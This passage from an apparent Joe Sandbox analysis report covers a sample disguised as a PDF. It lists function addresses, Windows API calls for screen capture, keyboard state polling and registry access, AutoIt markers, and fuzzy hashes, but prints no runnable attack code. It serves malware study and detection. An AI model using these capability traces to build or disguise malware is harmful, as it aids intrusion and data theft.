                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3996160137-0
                                                                                                                      • Opcode ID: 60ded839844a243f36295616accd048432d9716884df32fd0de8544cb347d84a
                                                                                                                      • Instruction ID: e0af3210518d0ca78817d357786a58909e8c6939788d2110f6f4354563fc9d1e
                                                                                                                      • Opcode Fuzzy Hash: 60ded839844a243f36295616accd048432d9716884df32fd0de8544cb347d84a
                                                                                                                      • Instruction Fuzzy Hash: B2614C71900209EBDF44DF94DC45AAEBBB9FF45300F04826AF815A7291DB399A25CF61
                                                                                                                      Function 007C762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetDC.USER32(00000000), ref: 007C76A2
                                                                                                                      • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 007C76AE
                                                                                                                      • CreateCompatibleDC.GDI32(?), ref: 007C76BA
                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 007C76C7
                                                                                                                      • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 007C771B
                                                                                                                      • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 007C7757
                                                                                                                      • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 007C777B
                                                                                                                      • SelectObject.GDI32(00000006,?), ref: 007C7783
                                                                                                                      • DeleteObject.GDI32(?), ref: 007C778C
                                                                                                                      • DeleteDC.GDI32(00000006), ref: 007C7793
                                                                                                                      • ReleaseDC.USER32(00000000,?), ref: 007C779E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                      • String ID: (
                                                                                                                      • API String ID: 2598888154-3887548279
                                                                                                                      • Opcode ID: 89f16f40524aaa71a0370cf34ecf7c7a0b66e4cdee3f4902b1ea60c0bb522036
                                                                                                                      • Instruction ID: b3614256bf291b747c1f0184ff52214dd706cae0265d9baa997120161b5836fc
                                                                                                                      • Opcode Fuzzy Hash: 89f16f40524aaa71a0370cf34ecf7c7a0b66e4cdee3f4902b1ea60c0bb522036
                                                                                                                      • Instruction Fuzzy Hash: 98511975904209EFCB15CFA8CC85EAEBBB9EF48710F14C52EE95AA7210D635A940CB64
                                                                                                                      Function 00756BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00770B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00756C6C,?,00008000), ref: 00770BB7
                                                                                                                        • Part of subcall function 007548AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007548A1,?,?,007537C0,?), ref: 007548CE
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00756D0D
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00756E5A
                                                                                                                        • Part of subcall function 007559CD: _wcscpy.LIBCMT ref: 00755A05
                                                                                                                        • Part of subcall function 0077387D: _iswctype.LIBCMT ref: 00773885
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                      • API String ID: 537147316-1018226102
                                                                                                                      • Opcode ID: add1d7bf6f15724092f52b4dee4b7a1eeb3a644cf4665c8871cc8eb76fed3c52
                                                                                                                      • Instruction ID: 9239c05e2fe13333701ce700d7bd836d7ba83b836f74fc69fda7e89d5f3c1059
                                                                                                                      • Opcode Fuzzy Hash: add1d7bf6f15724092f52b4dee4b7a1eeb3a644cf4665c8871cc8eb76fed3c52
                                                                                                                      • Instruction Fuzzy Hash: BA02CD71108340DFC724EF24C895AAFBBE5BF88354F44491DF88A932A1DB78E949CB52
                                                                                                                      Function 007545DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 007545F9
                                                                                                                      • GetMenuItemCount.USER32(00816890), ref: 0078D7CD
                                                                                                                      • GetMenuItemCount.USER32(00816890), ref: 0078D87D
                                                                                                                      • GetCursorPos.USER32(?), ref: 0078D8C1
                                                                                                                      • SetForegroundWindow.USER32(00000000), ref: 0078D8CA
                                                                                                                      • TrackPopupMenuEx.USER32(00816890,00000000,?,00000000,00000000,00000000), ref: 0078D8DD
                                                                                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0078D8E9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2751501086-0
                                                                                                                      • Opcode ID: a757584ca19566f1544b46723356782615c9750aebfccd9445fc5b71c760cf17
                                                                                                                      • Instruction ID: 7cd754ed6b35dc6b4844eeb7e91eb3d36f1e19f66a0671aa032bad9f8317c987
                                                                                                                      • Opcode Fuzzy Hash: a757584ca19566f1544b46723356782615c9750aebfccd9445fc5b71c760cf17
                                                                                                                      • Instruction Fuzzy Hash: C4714630681205BEEB309F24DC49FEABF65FF04368F244216F925A61E1C7B96C60DB94
                                                                                                                      Function 007C8BC0 Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 007C8BEC
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 007C8C19
                                                                                                                      • CoUninitialize.OLE32 ref: 007C8C23
                                                                                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 007C8D23
                                                                                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 007C8E50
                                                                                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,007E2C0C), ref: 007C8E84
                                                                                                                      • CoGetObject.OLE32(?,00000000,007E2C0C,?), ref: 007C8EA7
                                                                                                                      • SetErrorMode.KERNEL32(00000000), ref: 007C8EBA
                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 007C8F3A
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 007C8F4A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                      • String ID: ,,~
                                                                                                                      • API String ID: 2395222682-1083855107
                                                                                                                      • Opcode ID: bfe972e247bc41af42d852337b92e197181e4cad960ba48bed970796b57a77df
                                                                                                                      • Instruction ID: 01d299d548d6c5a4786b559b14785818bc7fd9747a79c466d26a0dd40b9e559d
                                                                                                                      • Opcode Fuzzy Hash: bfe972e247bc41af42d852337b92e197181e4cad960ba48bed970796b57a77df
                                                                                                                      • Instruction Fuzzy Hash: D1C134B1608305EFC740DF24C884E6AB7E9BF89348F00496DF98A9B251DB75ED05CB62
                                                                                                                      Function 007D10A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,007D0038,?,?), ref: 007D10BC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharUpper
                                                                                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                      • API String ID: 3964851224-909552448
                                                                                                                      • Opcode ID: 6d8b6fd503f77954de2a0fd4d60241689cb27af5eb2700faca9bdac2acbd658f
                                                                                                                      • Instruction ID: 4e436fa7cc51ca61a602a2a7f15de7bfb0c52615e7e7477464fdb72afd33622d
                                                                                                                      • Opcode Fuzzy Hash: 6d8b6fd503f77954de2a0fd4d60241689cb27af5eb2700faca9bdac2acbd658f
                                                                                                                      • Instruction Fuzzy Hash: 9F414D3025024EDBCF20EFA0DC95AEA3734FF15340F908455FD959B292DB79A95ACBA0
                                                                                                                      Function 007B5569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00757D2C: _memmove.LIBCMT ref: 00757D66
                                                                                                                        • Part of subcall function 00757A84: _memmove.LIBCMT ref: 00757B0D
                                                                                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 007B55D2
                                                                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 007B55E8
                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007B55F9
                                                                                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 007B560B
                                                                                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 007B561C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: SendString$_memmove
                                                                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                      • API String ID: 2279737902-1007645807
                                                                                                                      • Opcode ID: c75809651b282d0d6947431f7be0d0c2fb414035293452cb9de10d49af63b616
                                                                                                                      • Instruction ID: 8eaf4428a8d9c1057cce06ac70a7ef8da00c0f33fa8da1670df14a3c9ac2a75f
                                                                                                                      • Opcode Fuzzy Hash: c75809651b282d0d6947431f7be0d0c2fb414035293452cb9de10d49af63b616
                                                                                                                      • Instruction Fuzzy Hash: A5118220A50269B9E728A675DC4AEFFBB7CFF95F01F400469B811E21D1EEA81D09C5A1
                                                                                                                      Function 007B48F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                      • String ID: 0.0.0.0
                                                                                                                      • API String ID: 208665112-3771769585
                                                                                                                      • Opcode ID: aecf8f15b30f530d04c4eaebbf6410e1fca64cc8e1de0316ad1412f202e6a440
                                                                                                                      • Instruction ID: e90cff8d363b4489c2c07fd58f9fc008c22421eb22405aa41a0046911c78a3bf
                                                                                                                      • Opcode Fuzzy Hash: aecf8f15b30f530d04c4eaebbf6410e1fca64cc8e1de0316ad1412f202e6a440
                                                                                                                      • Instruction Fuzzy Hash: 2911D232904115EBCB24AB249C0AFDB77BCDB01760F0481B6F44996192EF7CAA819B61
                                                                                                                      Function 007B5217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • timeGetTime.WINMM ref: 007B521C
                                                                                                                        • Part of subcall function 00770719: timeGetTime.WINMM(?,75C0B400,00760FF9), ref: 0077071D
                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 007B5248
                                                                                                                      • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 007B526C
                                                                                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 007B528E
                                                                                                                      • SetActiveWindow.USER32 ref: 007B52AD
                                                                                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 007B52BB
                                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 007B52DA
                                                                                                                      • Sleep.KERNEL32(000000FA), ref: 007B52E5
                                                                                                                      • IsWindow.USER32 ref: 007B52F1
                                                                                                                      • EndDialog.USER32(00000000), ref: 007B5302
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                      • String ID: BUTTON
                                                                                                                      • API String ID: 1194449130-3405671355
                                                                                                                      • Opcode ID: d5d6359046e3de7108ec0128d41e86bcd4157a960aaab0c6012ccff4701da7cd
                                                                                                                      • Instruction ID: 1f5e5612de6bc84f238b005ecc58d5b8f02c67d21c798e9073809516c1763d75
                                                                                                                      • Opcode Fuzzy Hash: d5d6359046e3de7108ec0128d41e86bcd4157a960aaab0c6012ccff4701da7cd
                                                                                                                      • Instruction Fuzzy Hash: DD216FB0206704EFE7015B60ED89BE63B7EFB54386F089429F102822B1DB799D508B66
                                                                                                                      Function 007BD7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00759997: __itow.LIBCMT ref: 007599C2
                                                                                                                        • Part of subcall function 00759997: __swprintf.LIBCMT ref: 00759A0C
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 007BD855
                                                                                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 007BD8E8
                                                                                                                      • SHGetDesktopFolder.SHELL32(?), ref: 007BD8FC
                                                                                                                      • CoCreateInstance.OLE32(007E2D7C,00000000,00000001,0080A89C,?), ref: 007BD948
                                                                                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 007BD9B7
                                                                                                                      • CoTaskMemFree.OLE32(?,?), ref: 007BDA0F
                                                                                                                      • _memset.LIBCMT ref: 007BDA4C
                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 007BDA88
                                                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 007BDAAB
                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 007BDAB2
                                                                                                                      • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 007BDAE9
                                                                                                                      • CoUninitialize.OLE32(00000001,00000000), ref: 007BDAEB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1246142700-0
                                                                                                                      • Opcode ID: d13ec442195752366146243a5e67acc6e1826615460e8db120b41fcece8b9f96
                                                                                                                      • Instruction ID: e0d6fd526cb851e5b97d9a2af5a7f453b51f798015fa69b4b40f37dd22f411b1
                                                                                                                      • Opcode Fuzzy Hash: d13ec442195752366146243a5e67acc6e1826615460e8db120b41fcece8b9f96
                                                                                                                      • Instruction Fuzzy Hash: ACB10A75A00108EFDB14DFA4C888EAEBBB9FF48315B148469F90AEB251DB74ED45CB50
                                                                                                                      Function 007B052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetKeyboardState.USER32(?), ref: 007B05A7
                                                                                                                      • SetKeyboardState.USER32(?), ref: 007B0612
                                                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 007B0632
                                                                                                                      • GetKeyState.USER32(000000A0), ref: 007B0649
                                                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 007B0678
                                                                                                                      • GetKeyState.USER32(000000A1), ref: 007B0689
                                                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 007B06B5
                                                                                                                      • GetKeyState.USER32(00000011), ref: 007B06C3
                                                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 007B06EC
                                                                                                                      • GetKeyState.USER32(00000012), ref: 007B06FA
                                                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 007B0723
                                                                                                                      • GetKeyState.USER32(0000005B), ref: 007B0731
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: State$Async$Keyboard
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 541375521-0
                                                                                                                      • Opcode ID: 481b3e5c3c5be9d55598ea0ce36828777a88ad75917729f8d64ce8f0b343a12b
                                                                                                                      • Instruction ID: ec384e3dae67a16c38cbc7f1793013f2f86f244beb04860638577318896dad61
                                                                                                                      • Opcode Fuzzy Hash: 481b3e5c3c5be9d55598ea0ce36828777a88ad75917729f8d64ce8f0b343a12b
                                                                                                                      • Instruction Fuzzy Hash: AD51EB20A0478859FF35DBB08455BEBBFB49F01380F48859AD5C2565C2DA6CAB4CCBE1
                                                                                                                      Function 007AC72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 007AC746
                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 007AC758
                                                                                                                      • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 007AC7B6
                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 007AC7C1
                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 007AC7D3
                                                                                                                      • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 007AC827
                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 007AC835
                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 007AC846
                                                                                                                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 007AC889
                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 007AC897
                                                                                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 007AC8B4
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 007AC8C1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3096461208-0
                                                                                                                      • Opcode ID: c6ea2152c5bf891d271d06e21493100c7919cab4037a7ed07a1b360aba025939
                                                                                                                      • Instruction ID: 3e5ea42c84cb4925b0de5092a1cf15d1344de85a4d52c0a863d6db2c66404f13
                                                                                                                      • Opcode Fuzzy Hash: c6ea2152c5bf891d271d06e21493100c7919cab4037a7ed07a1b360aba025939
                                                                                                                      • Instruction Fuzzy Hash: A2514F71B00205BBDB18CF68DD89AAEBBB6FB89311F14822DF516D6290D7749D008B14
                                                                                                                      Function 0075201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00751B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00752036,?,00000000,?,?,?,?,007516CB,00000000,?), ref: 00751B9A
                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 007520D3
                                                                                                                      • KillTimer.USER32(-00000001,?,?,?,?,007516CB,00000000,?,?,00751AE2,?,?), ref: 0075216E
                                                                                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 0078BEF6
                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007516CB,00000000,?,?,00751AE2,?,?), ref: 0078BF27
                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007516CB,00000000,?,?,00751AE2,?,?), ref: 0078BF3E
